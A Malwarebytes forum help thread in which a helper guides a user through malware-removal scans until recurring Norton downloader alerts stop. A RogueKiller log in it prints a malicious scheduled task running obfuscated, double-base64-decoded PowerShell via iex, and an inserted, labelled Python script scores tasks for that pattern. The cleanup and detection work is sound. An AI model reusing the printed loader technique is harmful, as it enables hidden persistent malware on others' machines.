tammathah

dl.downloader!gen11 tries to connect but is blocked by norton


hello,

 

Every 20 minutes I get a pop-up from Norton telling me it has blocked dl.downloader!gen11 and has deleted it. I can't find any other information besides that it is linked to powershell.exe. When I run Norton, it doesn't find a thing; when I run Malwarebytes, it doesn't find a thing. It looks like my system is clean and yet I can't get rid of the pop-up.

 

Can anyone help me please?

20190412 malwarebytes rapport.txt Addition.txt FRST.txt


Hello, Welcome to Malwarebytes.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Please download the attached Fixlist.txt file to the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please post the Fixlog.txt and let me know what problem persists.

fixlist.txt


It isn't fixed :( I just got the pop-up again saying Auto-Protect had removed safety risk CL.Downloader!Gen11.


Hi,

Syncing

If you are syncing Firefox with other devices, reset it.
https://support.mozilla.org/en-US/kb/how-do-i-set-sync-my-computer

When all is well you can re-sync your devices.
<<<>>>

If this does not solve the issue, remove and re-install Firefox

Before proceeding save your Bookmarks. (Export)
https://support.mozilla.org/en-US/kb/export-firefox-bookmarks-to-backup-or-transfer

Firefox Password manager - Import your passwords.
Password Manager - Remember, delete, change and import saved passwords in Firefox
https://support.mozilla.org/en-US/kb/password-manager-remember-delete-change-and-import#w_protecting-your-passwords

If the problem persists in Firefox and you are Syncing with other Devices reset it.
https://support.mozilla.org/en-US/kb/how-do-i-set-sync-my-computer

When all is well you can re-sync your devices.

Clean the Firefox Cache.
https://kb.iu.edu/d/ahic#firefox

Remove Firefox using the instructions on this page.
https://support.mozilla.org/en-US/kb/uninstall-firefox-from-your-computer

Restart the computer normally.

Install the latest version of the application.
https://www.mozilla.org/en-US/firefox/new/

Import your Bookmarks. Same link as the Export function above.

Restart the computer normally.
<<<>>>

Let me know if all is well or not.


No, it didn't. I deleted Firefox and deleted the AppData. As soon as I rebooted, the pop-up from Norton was there again. I haven't installed Firefox yet.


Hi,

Which browser were you using at the time?

Also, do you have other browsers installed?


I have Waterfox, Edge and Internet Explorer. I wasn't using a browser at all when it popped up during startup. I can even play a game, have no browsers open, and then it pops up as well.


Hi,

Please scan the computer with the Farbar program one more time.

Make sure that the box to create an Addition.txt log is checked.

Task: {AB704F57-9CB0-45C6-A76F-252A5487B95D} - System32\Tasks\Microsoft\Windows\Maintenance\WinNAT => 1.vbs

Post the log if this entry is still listed.
===

Let's see what we can find in the Registry.

Run the Farbar program .exe as an Administrator.

In the Search text area, copy and paste the following:
1.vbs
Once done, click on the Search Registry button and wait for FRST to finish the search
On completion, a log will open in Notepad. Copy and paste its content in your next reply
====

Let's check your files.

Run the Farbar program .exe again as an Administrator.

In the Search text area, copy and paste the following:
1.vbs
Once done, click on the Search Files button and wait for FRST to finish the search
On completion, a log will open in Notepad. Copy and paste its content in your next reply
===


The task isn't found in the Addition log.

===

Registry search log:

Farbar Recovery Scan Tool (x64) Versie: 17.03.2019
Gestart door Gebruiker (14-04-2019 16:19:11)
Gestart vanaf C:\Users\Gebruiker\Desktop
Boot Modus: Normal

================== Zoeken in register: "1.vbs" ===========


====== Einde van Zoeken ======

===

File search log:

 

Farbar Recovery Scan Tool (x64) Versie: 17.03.2019
Gestart door Gebruiker (14-04-2019 16:20:01)
Gestart vanaf C:\Users\Gebruiker\Desktop
Boot Modus: Normal

================== Bestanden Zoeken: "1.vbs" =============


====== Einde van Zoeken ======


Hi

Please run this Sophos Virus Removal Tool

Please download Sophos Virus Removal Tool and save it to your computer's Desktop.

  • Right-click the icon and select Run as administrator.
  • Click Yes to accept any security warnings that may appear.
  • Click the Next button.
  • Select 'I accept the terms in the license agreement', then click Next twice.
  • Click the Install button and wait until the installation is complete.
  • Click the Finish button. The tool created a shortcut icon on the Desktop of your computer.
  • Now, double-click the Sophos Virus Removal Tool shortcut icon to run the tool.
  • Click Yes to accept any security warnings that may appear.
  • After it updates and a "Start Scanning" button appears in the lower right:
    • Disconnect from the Internet or physically unplug your Internet cable connection.
    • Close all open programs, scheduling/updating tasks and background processes that might activate during the scan including the screensaver.
    • Temporarily disable your anti-virus and real-time anti-spyware protection.



Windows Vista and above:
C:\ProgramData\Sophos\Sophos Virus Removal Tool\Logs\SophosVirusRemovalTool.log
 
Please post the contents of the log in your next reply and note any errors encountered.
===
 


Hi,

Let's try these scans.

Norton Power Eraser
https://us.norton.com/support/tools/npe.html?lcid=1033
Download and run the program.
===

Continue with these scans if the problem persists.

Open Malwarebytes Anti-Malware.

On the Settings tab > Protection, scroll to and make sure the following are selected:
Scan for Rootkits
Scan within Archives

Scroll further to Potential Threat Protection make sure the following are set as follows:

Potentially Unwanted Programs (PUP`s)        set as :- Always detect PUP`s (recommended)
Potentially Unwanted Modifications (PUM`s)  set as :- Always detect PUM`s (recommended)

Click on Scan and make sure Threat Scan is selected.

A Threat Scan will begin.

When the scan is complete if anything is found make sure that the first checkbox at the top is checked (that will automatically check all detected items), then click on the Quarantine Selected Tab

If asked to restart your computer to complete the removal, please do so

When complete click on Export Summary after deletion (bottom-left corner) and select Copy to Clipboard.

Wait for the prompt to restart the computer to appear, then click on Yes.

After the restart once you are back at your desktop, open MBAM once more to retrieve the log.

To get the log from Malwarebytes do the following:

Click on the Reports tab > from main interface.
Double click on the Scan log which shows the Date and time of the scan just performed.
Click Export > From export you have two options:
  Copy to Clipboard - if selected right click to your reply and select "Paste" log will be pasted to your reply
  Text file (*.txt)        - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply
 
Use "Copy to Clipboard", then right-click in your reply > select "Paste"; that will copy the log to your reply.

===

--RogueKiller--

  • Download RogueKiller and SAVE it to your Desktop.
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator"
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a window opens to explain what [PUM's] are, read about it.
  • Click the RogueKiller icon on your taskbar to return to the report.
  • Click open the Report
  • Click Export TXT button
  • Save the file as ReportRogue.txt
  • Click the Remove button to delete the items in RED  
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next reply.


=======
 


Malwarebytes
www.malwarebytes.com

-Logboekdetails-
Scandatum: 16-04-19
Scantijd: 00:35
Logbestand: bf786ecc-5fce-11e9-9d2d-9cb654f226f2.json

-Software-informatie-
Versie: 3.7.1.2839
Versie componenten: 1.0.563
Update pakketversie: 1.0.10180
Licentie: Proef

-Systeeminformatie-
Besturingssysteem: Windows 10 (Build 17763.437)
Processor: x64
Bestandssysteem: NTFS
Gebruiker: System

-Scansamenvatting-
Scantype: Bedreigingsscan
Scan geactiveerd door: Scheduler
Resultaat: Voltooid
Objecten gescand: 293092
Dreigingen herkend: 0
Dreigingen in quarantaine: 0
Verstreken tijd: 5 min, 38 sec

-Scanopties-
Geheugen: Ingeschakeld
Opstarten: Ingeschakeld
Bestandssysteem: Ingeschakeld
Archieven: Ingeschakeld
Rootkits: Uitgeschakeld
Heuristiek: Ingeschakeld
POP: Detectie
POA: Detectie

-Scandetails-
Proces: 0
(Geen kwaadaardige items gedetecteerd)

Module: 0
(Geen kwaadaardige items gedetecteerd)

Registersleutel: 0
(Geen kwaadaardige items gedetecteerd)

Registerwaarde: 0
(Geen kwaadaardige items gedetecteerd)

Registerdata: 0
(Geen kwaadaardige items gedetecteerd)

Gegevensstroom: 0
(Geen kwaadaardige items gedetecteerd)

Map: 0
(Geen kwaadaardige items gedetecteerd)

Bestand: 0
(Geen kwaadaardige items gedetecteerd)

Fysieke sector: 0
(Geen kwaadaardige items gedetecteerd)

WMI: 0
(Geen kwaadaardige items gedetecteerd)


(end)

 

====

RogueKiller Anti-Malware V13.1.9.0 (x64) [Mar 27 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.17763) 64 bits
Started in : Normal mode
User : Gebruiker [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190326_132530, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/04/16 00:46:11 (Duration : 00:08:58)
Switches : -refid 3

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] \Microsoft\Windows\UNP\UNP -- powershell.exe [-c "$ddd = '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';iex('$'+'d=''Wm5WdVkzUnBiMjRnWkdWaktGdGllWFJsVzExZEpHTmlMQ0JiYzNSeWFXNW5YU1J3WVhOektYc2tjR0lnUFNCYlUzbHpkR1Z0TGxSbGVIUXVSVzVqYjJScGJtZGRPanBWVkVZNExrZGxkRUo1ZEdWektDUndZWE56S1Rza2N5QTlJQ1J3WWxzd1hUc2thajB3TzJadmNpZ2thU0E5SURBN0lDUnBJQzFzZENBa1kySXVRMjkxYm5RN0lDUnBLeXNwZTJsbUtDUnFJQzFuWlNBa2NHSXVRMjkxYm5RcGV5UnFQVEI5SUNSeklEMGdLREl6SUMxaVlXNWtJQ1J6SUMxaWIzSWdNVFV5S1NBdFluaHZjaUFrY3pza1kySmJKR2xkSUQwZ0pHTmlXeVJwWFNBdFluaHZjaUFrY0dKYkpHcGRJQzFpZUc5eUlDUnpPeVJxS3l0OWNtVjBkWEp1SUNSallqdDlKRzlpYWlBOUlHZDNiV2tnZDJsdU16SmZaR2x6YTJSeWFYWmxJSHdnZDJobGNtVWdleVJmTGtSbGRtbGpaVWxFSUMxbGNTQW5YRnd1WEZCSVdWTkpRMEZNUkZKSlZrVXdKMzBnZkNCelpXeGxZM1FnVFc5a1pXd3NJRk5sY21saGJHNTFiV0psY2pza1pDQTlJR1JsWXlBb1cxTjVjM1JsYlM1RGIyNTJaWEowWFRvNlJuSnZiVUpoYzJVMk5GTjBjbWx1Wnlna1pHUmtLU2tnS0NSdlltb3VUVzlrWld3Z0t5QW5JQ2NnS3lBa2IySnFMbE5sY21saGJHNTFiV0psY2lrN2FXVjRJQ2hwWlhnb0oxdFRlWE4wWlcwdVZHVjRkQzVGYm1OdlpHbHVaMTA2T2xWVVJqZ3VSMlYwSnlzblUzUnlhVzVuS0NSa0tTY3BLUT09'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')"] -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Hosts file is too big

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Gen1 (Potentially Malicious)] (folder) Free Registry Cleaner -- C:\Users\Gebruiker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner -> Found
[Adw.Xunlei (Malicious)] (folder) Thunder Network -- C:\ProgramData\Thunder Network -> Found
[BitMiner.Gen0 (Malicious)] (folder) Windows -- C:\ProgramData\Windows -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
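The entry RogueKiller flagged under Tasks above has the shape of fileless persistence that a pop-up like the one described would trace back to: a task under \Microsoft\Windows\ whose action is powershell.exe with an inline -c script, which splits its strings with '+' to dodge keyword matching, base64-decodes a blob twice in a loop, and hands the result to iex. The Python script below is an added example, not part of the thread and not RogueKiller's code; it parses lines in that log format (constructed samples are embedded, with a constructed placeholder in place of the real payload) and scores each task on those traits so the same check can be run over an exported task list.

```python
"""Triage scheduled-task entries for fileless PowerShell persistence.

Added example (not from the thread, not RogueKiller's own code). It parses
lines in the shape of RogueKiller's "Tasks" section and scores each one on
the traits visible in the UNP entry above: a task living under
\\Microsoft\\Windows\\ that launches powershell.exe with an inline -c script,
string-splitting obfuscation ('Sys'+'tem'), a long base64 blob,
FromBase64String decoding and a final iex.
"""
import re
from typing import Dict, List, Optional

# Constructed sample lines (not the real log). The first mimics the UNP task
# above; its payload is replaced by a constructed 120-character placeholder.
SAMPLE_TASK_LINES = [
    r"[Suspicious.Path (Potentially Malicious)] \Microsoft\Windows\UNP\UNP -- powershell.exe "
    + "[-c \"$ddd = '" + "Q" * 120
    + "';iex('$'+'d=''Wm5WdVkz'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')\"] -> Found",
    r"\Microsoft\Windows\Defrag\ScheduledDefrag -- %windir%\system32\defrag.exe [-c -h -o -$] -> Found",
    r"\Backup\NightlyReport -- powershell.exe [-NoProfile -File C:\Scripts\report.ps1] -> Found",
]

# Line shape: "[tag] \task\path -- exe [arguments] -> status"
TASK_RE = re.compile(
    r"^(?:\[(?P<tag>[^\]]*)\]\s+)?"
    r"(?P<task>\\\S+)\s+--\s+"
    r"(?P<exe>\S+)\s+"
    r"\[(?P<args>.*)\]\s+->\s+(?P<status>\w+)$"
)
SPLIT_STRING_RE = re.compile(r"'\s*\+\s*'")
POWERSHELL_RE = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.I)


def deobfuscate(args: str) -> str:
    """Join split string literals ('Sys'+'tem' -> 'System') so keyword checks
    see the real text. Arithmetic tricks such as 'TF'+4*2 are left alone."""
    return SPLIT_STRING_RE.sub("", args)


def parse_task_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one task line, or None if it does not parse."""
    m = TASK_RE.match(line.strip())
    return m.groupdict() if m else None


def indicators_for(entry: Dict[str, str]) -> List[str]:
    """List the heuristic traits present in one parsed entry."""
    raw = entry["args"]
    clean = deobfuscate(raw)
    is_ps = POWERSHELL_RE.search(entry["exe"]) is not None
    found = []
    if re.search(r"\biex\b|invoke-expression", clean, re.I):
        found.append("invoke-expression")
    if re.search(r"frombase64string", clean, re.I):
        found.append("base64-decode")
    if is_ps and re.search(r"(^|\s)-(c|command|e|ec|enc|encodedcommand)\b", raw, re.I):
        found.append("inline-command")
    if re.search(r"[A-Za-z0-9+/]{100,}={0,2}", raw):
        found.append("long-base64-blob")
    if len(SPLIT_STRING_RE.findall(raw)) >= 3:
        found.append("split-string-obfuscation")
    # Heuristic only: built-in Microsoft task folders rarely launch PowerShell
    # with an inline script, so this is worth a look, not a verdict.
    if is_ps and entry["task"].lower().startswith("\\microsoft\\windows\\"):
        found.append("microsoft-path-runs-powershell")
    return found


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """One record per parsable line, in input order; score = indicators hit."""
    results = []
    for line in lines:
        entry = parse_task_line(line)
        if entry is None:
            continue
        inds = indicators_for(entry)
        results.append({"task": entry["task"], "exe": entry["exe"],
                        "status": entry["status"], "indicators": inds,
                        "score": len(inds)})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_TASK_LINES):
        flag = "SUSPECT" if r["score"] >= 3 else "ok"
        print(f"{flag:7} score={r['score']} {r['task']} ({r['exe']}) {r['indicators']}")
```

On a live Windows system the same indicators apply to the Execute and Arguments fields of each action returned by Get-ScheduledTask, and to the task XML under C:\Windows\System32\Tasks; the score is a triage aid for deciding which entries to pull into a fix list, not a verdict, and the split-string join is deliberately only the cheap trick seen above.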

Hi,

Please download the attached Fixlist.txt file to the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please run the RogueKiller program one more time and post the fresh log.

Please post the Fixlog.txt and let me know what problem persists.

fixlist.txt


Since last night I haven't gotten a pop-up yet, so I think it's fixed.

Also, RogueKiller only found something Norton-related, so I didn't touch that because I don't want my antivirus to be messed up.

Fixlog.txt roguekiller2.txt


Hi,

It may be a false positive.

Submit the file in bold to VirusTotal:

C:\Program Files\Norton Security\Engine\22.17.0.183\NortonSecurity.exe

https://www.virustotal.com/gui/home/upload
Follow the instructions on the page.

It may be a new version and RogueKiller is targeting an unknown file.


This is the answer I got from Norton itself:

 

Submission Date: 2019-04-17 19:51:34
Tracking #: 43173871
Submitter: tamara kinders
Customer Notes: roguekiller sees it as a serious threat but i think its a false positive.

tamara kinders,

We have processed your submission (Tracking #43173871) and your submission is now closed. The following is a report of our findings for the files in your submission:

Submission Summary
________________________________

Files Submitted

#   Filename             MD5                               Determination   Signature Protection Name   RR Seq#
1   NortonSecurity.exe   229cb9487745972b70b539644ec99d67  Clean           N/A                         N/A

Developer Notes:

1. NortonSecurity.exe is a clean file.

________________________________

Assessment
________________________________

File 1: NortonSecurity.exe
MD5: 229cb9487745972b70b539644ec99d67
SHA256: 04e0645f72842f9659e805b54aed6744d3425e8270af1d6bb188c434ffaebd94
Determination: Clean
Submission Detail: This file is clean.
________________________________


I haven't gotten the pop-up anymore, so yes, all is well. Thank you so much for everything you've done for me :D
